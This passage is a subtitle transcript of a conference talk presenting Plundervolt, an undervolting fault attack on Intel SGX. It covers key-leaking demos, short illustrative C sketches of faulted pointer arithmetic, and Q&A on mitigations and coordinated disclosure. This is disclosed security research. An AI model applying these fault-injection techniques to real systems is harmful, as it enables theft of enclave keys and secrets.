    presentation. So I'm now going to compare.
  • 28:39 - 28:45
    Let me just pause that a second, I used
    somebody else's differential fault attack
  • 28:45 - 28:50
    and, for the first pair,
    it gave me 500 possible keys and for the
  • 28:50 - 28:54
    second it gave me 200 possible keys. I'm
    overlapping them. And there was only one
  • 28:54 - 29:00
    key that matched both. And that's the key
    that came out. And let's just again check
  • 29:00 - 29:06
    inside the source code, does that key
    exist? What is the key? And yeah, that is
  • 29:06 - 29:10
    the key. So, again what I've...
    Daniel: That is not a very good key,
  • 29:10 - 29:14
    though.
    Kit: No, Ehhh... I think, if you think
  • 29:14 - 29:18
    about randomness, it's as good as any
    other. Anyway, ehhh...
  • 29:18 - 29:21
    Laughter
    Kit: What have I done? I have flipped a
  • 29:21 - 29:29
    bit inside SGX to create a fault in the AES
    New Instructions (AES-NI) that has enabled me to
  • 29:29 - 29:34
    get the AES key out of SGX. You shouldn't
    be able to do that.
  • 29:34 - 29:40
    Daniel: So. So now that we have multiple
    attacks, we should think about a logo and
  • 29:40 - 29:43
    a name, right?
    Kit: This one better be good because the
  • 29:43 - 29:47
    other one wasn't very good.
    Daniel: No, seriously, we are already
  • 29:47 - 29:48
    soon...
    Kit: Okay.
  • 29:48 - 29:51
    Daniel: We are, we will write this out.
    Send this to a conference. People will
  • 29:51 - 29:57
    like it, right. And I already have
    a name and a logo for it. Kit: Come on
  • 29:57 - 29:59
    then.
    Daniel: Crypto Vault Screw Hammer.
  • 29:59 - 30:03
    Laughter
    Daniel: It's like, we attack crypto in a
  • 30:03 - 30:07
    vault, SGX, and it's like a, like the
    CLKscrew and like Rowhammer. And
  • 30:07 - 30:12
    like...
    Kit: I don't think that's very catchy. But
  • 30:12 - 30:20
    let me tell you, it's not just crypto. So
    we're faulting multiplication. So surely
  • 30:20 - 30:24
    there's another use for this other than
    crypto. And this is where something really
  • 30:24 - 30:28
    interesting happens. For those of you who
    are really good at C you can come and
  • 30:28 - 30:34
    explain this to me later. This is a really
    simple bit of C. All I'm doing is getting
  • 30:34 - 30:39
    an offset of an array and taking the
    address of that and putting it into a
  • 30:39 - 30:44
    pointer. Why is this interesting? Hmmm,
    it's interesting because I want to know
  • 30:44 - 30:48
    what the compiler does with that. So I am
    going to wave my magic wand and what the
  • 30:48 - 30:53
    compiler is going to do is it's going to
    make this. Why is that interesting?
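    The transformation Kit describes, sketched in C (the element
    size and names are illustrative, not the code from the talk):

        #include <stdint.h>

        /* An element size that is not a power of two forces the
         * compiler to emit a real multiply for the indexing. */
        typedef struct { uint8_t bytes[24]; } elem_t;

        elem_t *get_slot(elem_t *array, uint64_t offset)
        {
            /* &array[offset] compiles to
             *     array + offset * sizeof(elem_t)
             * so a faulted multiply yields a pointer far away
             * from the array, potentially outside the enclave. */
            return &array[offset];
        }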
  • 30:53 - 30:58
    Daniel: Simple pointer arithmetic?
    Kit: Hmmm. Well, we know that we can fault
  • 30:58 - 31:02
    multiplications. So we're no longer
    looking at crypto. We're now looking at
  • 31:02 - 31:09
    just memory. So let's see if I can use
    this as an attack. So let me try and
  • 31:09 - 31:13
    explain what's going on here. On the right
    hand side, you can see the undervolting.
  • 31:13 - 31:16
    I'm going to create an enclave and I've
    put it in debug mode so that I can see
  • 31:16 - 31:20
    what's going on. You can see the size of
    the enclave because we've got the base and
  • 31:20 - 31:29
    the limit of it. And if we look at that in
    a diagram, what that's saying is here. If
  • 31:29 - 31:35
    I can write anything at the top above
    that, that will no longer be encrypted,
  • 31:35 - 31:42
    that will be unencrypted. Okay, let's
    carry on with that. So, let's just write
  • 31:42 - 31:46
    that one statement again and again, that
    pointer arithmetic again and again and
  • 31:46 - 31:53
    again whilst I'm undervolting and see what
    happens. Oh, suddenly it changed and if
  • 31:53 - 31:58
    you look at where it's mapped to, it
    has mapped that pointer to memory that is
  • 31:58 - 32:06
    no longer inside SGX, it has put it into
    untrusted memory. So we're just doing the
  • 32:06 - 32:10
    same statement again and again whilst
    undervolting. Bosh, we've written
  • 32:10 - 32:15
    something that was in the enclave out of
    the enclave. And I'm just going to display
  • 32:15 - 32:19
    the page of memory that we've got there to
    show you what it was. And there's the one
  • 32:19 - 32:25
    line, it's deadbeef. And again, I'm just
    going to look in my source code to see
  • 32:25 - 32:30
    what it was. Yeah, it's, you know, you
    know, endianness, blah, blah, blah. I have
  • 32:30 - 32:36
    now not even used crypto. I have purely
    used pointer arithmetic to take something
  • 32:36 - 32:43
    that was stored inside Intel's SGX and
    move it into user space where anyone can
  • 32:43 - 32:46
    read it.
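    The in-enclave side of this demo might be as simple as the
    following sketch (an assumed reconstruction, reusing elem_t
    from the earlier sketch; the faulted multiplication hides
    inside the array indexing):

        #include <stdint.h>

        typedef struct { uint8_t bytes[24]; } elem_t;

        /* Runs inside the enclave. Normally every write lands in
         * enclave memory; when undervolting faults the pointer
         * multiplication in &array[offset], the write lands in
         * untrusted memory, in plaintext. volatile forces the
         * multiply to be redone on every iteration. */
        void leak_loop(elem_t *array, volatile uint64_t offset)
        {
            for (;;) {
                uint32_t *p = (uint32_t *)&array[offset];
                *p = 0xdeadbeef;   /* the "secret" from the demo */
            }
        }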
    Daniel: So, yes, I get your point. It's
  • 32:46 - 32:49
    more than just crypto, right?
    Kit: Yeah.
  • 32:49 - 32:57
    Daniel: It's way beyond that. So we, we
    leaked RSA keys. We leaked AES keys.
  • 32:57 - 33:01
    Kit: Go on... Yeah, we did not just that
    though we did memory corruption.
  • 33:01 - 33:06
    Daniel: Okay, so. Yeah. Okay. Crypto Vault
    Screw Hammer, point taken, is not the
  • 33:06 - 33:11
    ideal name, but maybe you could come up
    with something. We need a name and a logo.
  • 33:11 - 33:14
    Kit: So pressure's on me then. Right, here
    we go. So it's got to be due to
  • 33:14 - 33:21
    undervolting because we're undervolting.
    Maybe we can get a pun on vault and volt
  • 33:21 - 33:26
    in there somewhere. We're stealing
    something, aren't we? We're corrupting
  • 33:26 - 33:31
    something. Maybe. Maybe we're plundering
    something.
  • 33:31 - 33:32
    Daniel: Yeah?
    Kit: I know.
  • 33:32 - 33:33

    Daniel: No?
  • 33:33 - 33:37
    Kit: Let's call it Plundervolt.
    Daniel: Oh, no, no, no. That's not it.
  • 33:37 - 33:38
    That's not a good name.
    Kit: What?
  • 33:38 - 33:43
    Daniel: That, no. We need something...
    That's really not a good name. People will
  • 33:43 - 33:51
    hate this name.
    Kit: Wait, wait, wait, wait, wait.
  • 33:51 - 33:54
    Daniel: No...
    Laughter
  • 33:54 - 33:57
    Kit: You can read this if you like,
    Daniel.
  • 33:57 - 34:01
    Daniel: Okay. I, I think I get it. I, I
    think I get it.
  • 34:01 - 34:17
    Kit: No, no, I haven't finished.
    Laughter
  • 34:17 - 34:35
    Daniel: Okay. Yeah, this is really also a
    very nice comment. Yes. The quality of the
  • 34:35 - 34:38
    videos, I think you did a very good job
    there.
  • 34:38 - 34:41
    Kit: Thank you.
    Daniel: Also, the website really good job
  • 34:41 - 34:43
    there.
    Kit: So, just to summarize, what we've
  • 34:43 - 34:53
    done with Plundervolt is: it's a new type
    of attack, it breaks the integrity of SGX.
  • 34:53 - 34:57
    It's within SGX. We're doing stuff we
    shouldn't be able to.
  • 34:57 - 35:01
    Daniel: Like AES keys, we leak AES keys,
    yeah.
  • 35:01 - 35:06
    Kit: And we are retrieving the RSA
    signature key.
  • 35:06 - 35:11
    Daniel: Yeah. And yes, we induced memory
    corruption in bug-free code.
  • 35:11 - 35:20
    Kit: And we made the enclave write secrets
    to untrusted memory. This is the paper,
  • 35:20 - 35:28
    that's been accepted for next year. It is my
    first paper, so thank you very much. Kit,
  • 35:28 - 35:30
    that's me.
    Applause
  • 35:30 - 35:39
    Kit: Thank you. David Oswald, Flavio
    Garcia, Jo Van Bulck and of course, the
  • 35:39 - 35:46
    infamous Frank Piessens. So all that
    really remains for me to do is to say,
  • 35:46 - 35:49
    thank you very much for coming...
    Daniel: Wait a second, wait a second.
  • 35:49 - 35:53
    There's one more thing, I think you
    overlooked one of the tweets. I added it
  • 35:53 - 35:57
    here. You didn't see this slide yet?
    Kit: I haven't seen this one.
  • 35:57 - 36:01
    Daniel: This one, I really like it.
    Kit: It's a slightly ponderous pun on
  • 36:01 - 36:06
    Thunderbolt... a pirate-themed logo.
    Daniel: A pirate themed logo. I really
  • 36:06 - 36:13
    like it. And if it's a pirate themed logo,
    don't you think there should be a pirate
  • 36:13 - 36:16
    themed song?
    Laughter
  • 36:16 - 36:25
    Kit: Daniel, have you written a pirate
    theme song? Go on then, play it. Let's,
  • 36:25 - 36:37
    let's hear the pirate theme song.
    music -- see screen --
  • 36:37 - 37:09
    Music: ...Volt down me enclaves yo ho. Aye
    but it's fixed with a microcode patch.
  • 37:09 - 37:30
    Volt down me enclaves yo ho.
    Daniel: Thanks to...
  • 37:30 - 37:44
    Applause
    Daniel: Thanks to Manuel Weber and also to
  • 37:44 - 37:47
    my group at TU Graz for volunteering for
    the choir.
  • 37:47 - 37:52
    Laughter
    Daniel: And then, I mean, this is now the
  • 37:52 - 37:59
    last slide. Thank you for your attention.
    Thank you for being here. And we would
  • 37:59 - 38:02
    like to answer questions in the Q&A.
  • 38:02 - 38:07
    Applause
  • 38:07 - 38:14
    Herald: Thank you for your great talk. And
    thank you some more for the song. If you
  • 38:14 - 38:19
    have questions, please line up on the
    microphones in the room. First question
  • 38:19 - 38:23
    goes to the signal angel, any question
    from the Internet?
  • 38:23 - 38:27
    Signal-Angel: Not as of now, no.
    Herald: All right. Then, microphone number
  • 38:27 - 38:30
    4, your question please.
    Microphone 4: Hi. Thanks for the great
  • 38:30 - 38:35
    talk. So, why does this happen now? I
    mean, thanks for the explanation of the wrong
  • 38:35 - 38:38
    numbers, but it wasn't clear. What's going
    on there?
  • 38:38 - 38:47
    Daniel: So, if you look at circuits:
    for the signal to be ready at the output,
  • 38:47 - 38:54
    the electrons have to travel a bit.
    If you increase the voltage, things will
  • 38:54 - 39:00
    go faster. So they will, you will have the
    output signal ready at an earlier point in
  • 39:00 - 39:05
    time. Now the frequency that you choose
    for your processor should be related to
  • 39:05 - 39:09
    that. So if you choose the frequency too
    high, the outputs will not be ready yet at
  • 39:09 - 39:13
    this circuit. And this is exactly what
    happens, if you reduce the voltage the
  • 39:13 - 39:17
    outputs are not ready yet for the next
    clock cycle.
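    A first-order way to write this down (the alpha-power law;
    the exponent is process dependent, so this is a rough model,
    not a datasheet formula):

        t_delay ~ Vdd / (Vdd - Vth)^alpha

        fault when  t_delay > T_clk = 1 / f

    Lowering Vdd (undervolting) or raising f (overclocking) both
    push the critical-path delay past the clock edge.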
  • 39:17 - 39:23
    Kit: And interestingly, we couldn't fault
    really short instructions. So anything
  • 39:23 - 39:26
    like an add or an xor, it was basically
    impossible to fault. So they had to be
  • 39:26 - 39:31
    complex instructions that probably weren't
    finishing by the time the next clock tick
  • 39:31 - 39:32
    arrived.
    Daniel: Yeah.
  • 39:32 - 39:36
    Microphone 4: Thank you.
    Herald: Thanks for your answer. Microphone
  • 39:36 - 39:39
    number 4 again.
    Microphone 4: Hello. It's a very
  • 39:39 - 39:45
    interesting theoretical approach I think.
    But you were able to break these crypto
  • 39:45 - 39:53
    mechanisms, for example, because you could
    do zillions of iterations and you are sure
  • 39:53 - 39:58
    to trigger the fault. But in practice,
    say, when someone is having a secure
  • 39:58 - 40:04
    conversation, is it practical, even close
    to possible, to break it with that?
  • 40:04 - 40:08
    Daniel: It totally depends on your threat
    model. So what can you do with the
  • 40:08 - 40:13
    enclave? If you, we are assuming that we
    are running with root privileges here and
  • 40:13 - 40:17
    a root privileged attacker can certainly
    run the enclave with certain inputs, again
  • 40:17 - 40:22
    and again. If the enclave doesn't have any
    protection against replay, then certainly
  • 40:22 - 40:26
    we can mount an attack like that. Yes.
    Microphone 4: Thank you.
  • 40:26 - 40:31
    Herald: Signal-Angel your question.
    Signal-Angel: Somebody asked if the attack only
  • 40:31 - 40:34
    applies to Intel or to AMD or other
    architectures as well.
  • 40:34 - 40:38
    Kit: Oh, good question, I suspect right
    now there are people trying this attack on
  • 40:38 - 40:42
    AMD in the same way that when CLKscrew
    came out, there were an awful lot of
  • 40:42 - 40:47
    people starting to do stuff on Intel as
    well. We saw the CLKscrew attack on ARM
  • 40:47 - 40:52
    with frequency. Then we saw ARM with
    voltage. Now we've seen Intel with
  • 40:52 - 40:57
    voltage. And someone else has done something
    similar: V0LTpwn has done something very similar
  • 40:57 - 41:02
    to us. And I suspect AMD is the next one.
    I guess, because it's not out there as
  • 41:02 - 41:07
    much. We've tried to do them in the order
    of, you know, scaring people.
  • 41:07 - 41:10
    Laughter
    Kit: Scaring as many people as possible as
  • 41:10 - 41:14
    quickly as possible.
    Herald: Thank you for the explanation.
  • 41:14 - 41:18
    Microphone number 4.
    Microphone 4: Hi. Hey, great. Thanks for
  • 41:18 - 41:25
    the presentation. Can you get similar
    results by hardware? I mean by tweaking
  • 41:25 - 41:28
    the voltage that you provide to the CPU
    or...
  • 41:28 - 41:33
    Kit: Well, I refer you to my earlier
    answer. I know for a fact that there are
  • 41:33 - 41:37
    people doing this right now with physical
    hardware, seeing what they can do. Yes,
  • 41:37 - 41:41
    and I think it will not be long before
    that paper comes out.
  • 41:41 - 41:47
    Microphone 4: Thank you.
    Herald: Thanks. Microphone number one.
  • 41:47 - 41:51
    Your question. Sorry, microphone 4 again,
    sorry.
  • 41:51 - 41:58
    Microphone 4: Hey, thanks for the talk.
    Two small questions. One, why doesn't
  • 41:58 - 42:08
    anything break inside SGX when you do
    these tricks? And second one, why when you
  • 42:08 - 42:15
    write outside the enclave's memory, the
    value is not encrypted?
  • 42:15 - 42:22
    Kit: So the enclave is an encrypted area
    of memory. So when it points to an
  • 42:22 - 42:24
    unencrypted area, it's just
    going to write it to the unencrypted
  • 42:24 - 42:29
    memory. Does that make sense?
    Daniel: From the enclave's perspective,
  • 42:29 - 42:33
    none of the memory is encrypted. This is
    just transparent to the enclave. So if the
  • 42:33 - 42:37
    enclave writes to another memory
    location, yes, it just won't be encrypted.
  • 42:37 - 42:41
    Kit: Yeah. And what's happening is we're
    getting flips in the registers. Which is
  • 42:41 - 42:44
    why I think we're not getting an integrity
    check because the enclave is completely
  • 42:44 - 42:48
    unaware that anything's even gone wrong.
    It's got a value in its memory and it's
  • 42:48 - 42:51
    gonna use it.
    Daniel: Yeah. The integrity check is only
  • 42:51 - 42:55
    on the memory that you load from
    RAM. Yeah.
  • 42:55 - 43:03
    Herald: Okay, microphone number 7.
    Microphone 7: Yeah. Thank you. Interesting
  • 43:03 - 43:12
    work. I was wondering, you showed us the
    example of the code that wrote outside the
  • 43:12 - 43:17
    enclave memory using simple pointer
    arithmetic. Have you been able to talk to
  • 43:17 - 43:24
    Intel about why this memory access actually
    happens? I mean, you showed us the output
  • 43:24 - 43:29
    of the program. It crashes, but
    nevertheless, it writes the result to the
  • 43:29 - 43:34
    resulting memory address. So there must be
    something wrong, like the attack that
  • 43:34 - 43:40
    happened two years ago at the Congress
    about, you know, all that stuff.
  • 43:40 - 43:46
    Daniel: So generally enclaves can read and
    write any memory location in their host
  • 43:46 - 43:53
    application. We have also published papers
    that basically argued that this might not
  • 43:53 - 44:00
    be a good idea, a good design decision. But
    that's the current design. And the reason
  • 44:00 - 44:05
    is that this makes interaction with the
    enclave very easy. You can just place your
  • 44:05 - 44:09
    payload somewhere in the memory. Hand the
    pointer to the enclave and the enclave can
  • 44:09 - 44:14
    use the data from there, maybe copy it
    into the enclave memory if necessary, or
  • 44:14 - 44:20
    directly work on the data. So that's why
    this memory access to the normal memory
  • 44:20 - 44:24
    region is not illegal.
    Kit: And if you want to know more, you can
  • 44:24 - 44:29
    come and find Daniel afterwards.
    Herald: Okay. Thanks for the answer.
  • 44:29 - 44:33
    Signal-Angel, the questions from the
    Internet.
  • 44:33 - 44:39
    Signal-Angel: Yes. The question came up how
    stable the system you're attacking with
  • 44:39 - 44:42
    the hammering
    is while you're performing the attack.
  • 44:42 - 44:46
    Kit: It's really stable. Once I'd been
    through three months of crashing the
  • 44:46 - 44:50
    computer, I got to a point where I had a
    really, really good frequency-voltage
  • 44:50 - 44:56
    combination. And we did discover that on all
    Intel chips it was different. So even on
  • 44:56 - 44:59
    what looked like an identical machine, an almost
    identical little NUC we bought with
  • 44:59 - 45:06
    exactly the same spec, it had a
    different sort of frequency-voltage model.
  • 45:06 - 45:10
    But once we'd done this sort of
    benchmarking, you could pretty much do any
  • 45:10 - 45:15
    attack without it crashing at all.
    Daniel: But without this benchmarking,
  • 45:15 - 45:18
    it's true. We would often reboot.
    Kit: That was a nightmare, yeah. I wish I'd
  • 45:18 - 45:20
    done that at the beginning. It would've saved
    me so much time.
  • 45:20 - 45:25
    Herald: Thanks again for answering.
    Microphone number 4 your question.
  • 45:25 - 45:29
    Microphone 4: Can Intel fix this with a
    microcode update?
  • 45:29 - 45:37
    Daniel: So, there are different approaches
    to this. Of course, the quick fix is to
  • 45:37 - 45:42
    remove the access to the MSR, which is of
    course inconvenient because you can't
  • 45:42 - 45:45
    undervolt your system anymore. So maybe
    you want to choose whether you want to use
  • 45:45 - 45:51
    SGX or want to have a gaming computer
    where you undervolt the system or control
  • 45:51 - 45:56
    the voltage from software. But is this a
    real fix? I don't know. I think there are
  • 45:56 - 45:59
    more vectors, right?
    Kit: Yeah. But, well, I'll be interested to
  • 45:59 - 46:01
    see what they're going to do with the next
    generation of chips.
  • 46:01 - 46:05
    Daniel: Yeah.
    Herald: All right. Microphone number 7,
  • 46:05 - 46:09
    what's your question?
    Microphone 7: Yes, similarly to the other
  • 46:09 - 46:14
    question, is there a way you can prevent
    such attacks when writing code that runs
  • 46:14 - 46:18
    in the secure enclave?
    Kit: Well, no. That's the interesting
  • 46:18 - 46:23
    thing, it's really hard to do. Because we
    weren't writing code with bugs, we were
  • 46:23 - 46:27
    just writing normal pointer arithmetic.
    Normal crypto. If anywhere in your code,
  • 46:27 - 46:30
    you're using a multiplication. It can be
    attacked.
  • 46:30 - 46:35
    Daniel: But of course, you could use fault
    resistant implementations inside the
  • 46:35 - 46:39
    enclave. Whether that is a practical
    solution is yet to be determined.
  • 46:39 - 46:42
    Kit: Oh yes, yeah, right, you could write
    duplicate code and do comparison things
  • 46:42 - 46:47
    like that. But if, yeah.
    Herald: Okay. Microphone number 3. What's
  • 46:47 - 46:48
    your question?
  • 46:48 - 46:53
    Microphone 3: Hi. I can't imagine Intel
    being very happy about this and recently
  • 46:53 - 46:57
    they were under fire for how they were
    handling a coordinated disclosure. So can
  • 46:57 - 47:01
    you summarize your experience?
    Kit: They were... They were really nice.
  • 47:01 - 47:06
    They were really nice. We disclosed really
    early, like before we had all of the
  • 47:06 - 47:09
    attacks.
    Daniel: We just had a PoC at that point.
  • 47:09 - 47:11
    Kit: Yeah.
    Daniel: Yeah, simply a PoC. Very simple.
  • 47:11 - 47:15
    Kit: They've been really nice. They wanted
    to know what we were doing. They wanted to
  • 47:15 - 47:19
    see all our attacks. I found them lovely.
    Daniel: Yes.
  • 47:19 - 47:22
    Kit: Am I allowed to say that?
    Laughter
  • 47:22 - 47:25
    Daniel: I mean, they also have interest
    in...
  • 47:25 - 47:27
    Kit: Yeah.
    Daniel: ...making these processes smooth.
  • 47:27 - 47:30
    So that vulnerability researchers also
    report to them.
  • 47:30 - 47:32
    Kit: Yeah.
    Daniel: Because if everyone says, oh this
  • 47:32 - 47:38
    was awful, then they will also not get a
    lot of reports. But if they do their job
  • 47:38 - 47:40
    well, and they did in our case.
    Kit: Yeah.
  • 47:40 - 47:44
    Daniel: Then of course, it's nice.
    Herald: Okay. Microphone number 4...
  • 47:44 - 47:48
    Daniel: We even got a bug bounty.
    Kit: We did get a bug bounty. I didn't
  • 47:48 - 47:51
    want to mention that because I haven't
    told my university yet.
  • 47:51 - 47:55
    Laughter
    Microphone 4: Thank you. Thank you for the
  • 47:55 - 48:02
    funny talk. If I understood, you're right,
    it means to really be able to exploit
  • 48:02 - 48:07
    this. You need to do some benchmarking on
    the machine that you want to exploit. Do
  • 48:07 - 48:15
    you see any way to convert this to a
    remote exploit? I mean, to me, it
  • 48:15 - 48:20
    seems you need physical access right now
    because you need to reboot the machine.
  • 48:20 - 48:24
    Kit: If you've done benchmarking on an
    identical machine, I don't think you would
  • 48:24 - 48:27
    have to have physical access.
    Daniel: But you would have to make sure
  • 48:27 - 48:30
    that it's really an identical machine.
    Kit: Yeah.
  • 48:30 - 48:33
    Daniel: But in the cloud you will find a
    lot of identical machines.
  • 48:33 - 48:41
    Laughter
    Herald: Okay, microphone number 4 again.
  • 48:41 - 48:46
    Daniel: Also, as we said, like the
    temperature plays an important role.
  • 48:46 - 48:48
    Kit: Yeah.
    Daniel: You will also in the cloud find a
  • 48:48 - 48:52
    lot of machines at similar temperatures.
    Kit: And there is obviously
  • 48:52 - 48:56
    stuff that we didn't show you. We did
    start measuring the total amount of clock
  • 48:56 - 49:00
    ticks it took to do maybe 10 RSA
    encryptions. And then we did start doing
  • 49:00 - 49:04
    very specific timing attacks. But
    obviously it's much easier to just do
  • 49:04 - 49:10
    10,000 of them and hope that one faults.
    Herald: All right. Seems there are no
  • 49:10 - 49:14
    further questions. Thank you very much for
    your talk. For your research and for
  • 49:14 - 49:15
    answering all the questions.
    Applause
  • 49:15 - 49:19
    Kit: Thank you.
    Daniel: Thank you.
  • 49:19 - 49:22
    postroll music
  • 49:22 - 49:48
    subtitles created by c3subtitles.de
    in the year 20??. Join, and help us!